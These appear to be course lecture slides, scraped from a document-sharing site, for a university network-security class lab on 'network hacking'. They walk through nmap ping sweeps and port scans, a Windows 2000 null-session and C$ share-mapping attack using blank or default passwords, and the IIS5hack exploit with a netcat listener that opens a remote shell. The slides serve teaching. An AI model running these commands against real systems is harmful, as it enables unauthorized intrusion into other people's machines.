Itp 457 Network Security Network Hacking 101

Yüklə 464 b.
ölçüsü464 b.

ITP 457 Network Security

  • Network Hacking 101

Hacking Methodology (review)

  • 1. Gather target information

  • 2. Identify services and ports open on the target

  • 3. Research the discovered services for known vulnerabilities

  • 4. Attempt to exploit the services

  • 5. Utilize exploited services to gain additional privileges from the target

  • 6. Reiterate steps 1-5 until goals are achieved

Network Hacking

  • Methodology changes slightly because we are focused at this point on security from the inside

  • Gather information & map the network

  • Scan systems to see what’s alive

  • Determine services running

  • Attempt to penetrate the systems (if you want )

Gathering Information

  • Upon connection to the network

    • Check your IP – normally automatically assigned
      • Windows – ipconfig
      • Linux – ifconfig

Useful information from ipconfig

  • Physical Address – your computer’s MAC address

  • IPAddress – the ip address assigned to your computer

  • Subnet Mask – the mask used to limit the number of computers on the network

  • Default gateway – the computer that is used to connect to ip addresses outside of the network

  • DHCP server – the computer that distributes IP addresses

  • DNS servers – the computer that translates domain names to IP addresses

  • IPconfig will identify between 1 and 3 computers without any scanning! (DHCP, DNS, Gateway)


  • Ping sweep

    • Ping – ICMP “echo request” packets
    • Will return if host is reachable (alive)
  • Single command: ping host

    • Host can be an IP or a domain name (e.g.
  • We want to see all the hosts on our particular network

    • Nmap (or Umit)
      • nmap –sP <target range>

Ping sweep vs. port scanning

  • Why not start with port scanning?

    • Normally, ping scanning is benign and will not get you in trouble or caught
    • Port scanning is almost always seen as malicious
    • Limit the amount of time that you are port scanning by just looking at systems that are alive
    • Also, there may be multiple subnets (multiple parts of the network), with some not being occupied. A ping sweep will quickly determine if a particular IP range is up or not.

Determine Running Systems

  • Portscan the system that you want to break into

  • Nmap will give a great report, including port service numbers  very useful for determining what is vulnerable

  • Nmap will also try to tell you what operating system they are running

    • Is it always reliable?

Breaking in 

  • Once you’ve discovered what services are running, you have to see which are vulnerable

  • Determine which service you want to break, and find a vulnerability

    • Places to look:

Null Session Hack

  • One of the oldest tricks for Windows 2000

  • Will allow any hard disk mounted in the Win2k machine to be mapped as a network drive on the hacker’s machine

  • Utilizes a vulnerability in the SMB shares

  • First, determine the IP address of the Windows 2000 machine

    • Example:

Null Session Hack Cont’d

  • Establish the null session

    • net use \\ipaddress\ipc$ “” /u:””
    • This command establishes the null session connection

Get the list of the usernames

  • The program Dumpsec will give you the usernames and a whole lot more

    • Go to select computer, and enter the computer address
    • Go to “Dump Users as Column”, and it will give you options to add more information to the report


Map the network drive

  • The command “net use” can also be used to map the victim’s machine as a network drive on your computer

    • Caveat: you must know an adminstrator’s username and password
    • In our case, the user “Bob” does not have a password – typical for insecure computers
    • Another common one: username “Administrator” password “Password”
  • The command: net use Z: \\\c$ “password” /u:”username


We want more!

  • We’ve established a remote drive connection, but we cannot run any commands

  • We need either a remote shell (windows command prompt) or a remote window (VNC or terminal services)

    • Shell is easier, and does not require a lot of bandwidth

Remember the portscanning

  • IIS was installed

    • Version 5.0
  • So let’s take a look and see what’s available

    • Download IIS5hack from the exploit section
    • You will also need netcat
      • Use the command: nc –l –p 1111
      • Tells netcat to listen on port 1111

The hack!

  • With netcat running, open another command prompt, and enter the command:

  • iis5hack.exe victim-ip your-ip port-number

  • example:

  • iis5hack.exe 1111

  • This will open up a remote shell in the netcat window


What have you learned?

  • Methodology of a hack

  • How to remotely map a drive from a windows 2000 machine

  • How to hack IIS 5.0

Your lab

  • Find another way to hack into a Windows 2000 machine

  • Find a way to hack into the Windows XP SP0 machine

  • Give me step-by-step instructions on how you did it. What sites did you go to? What tools did you use?

Dostları ilə paylaş:

Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur © 2019
rəhbərliyinə müraciət

    Ana səhifə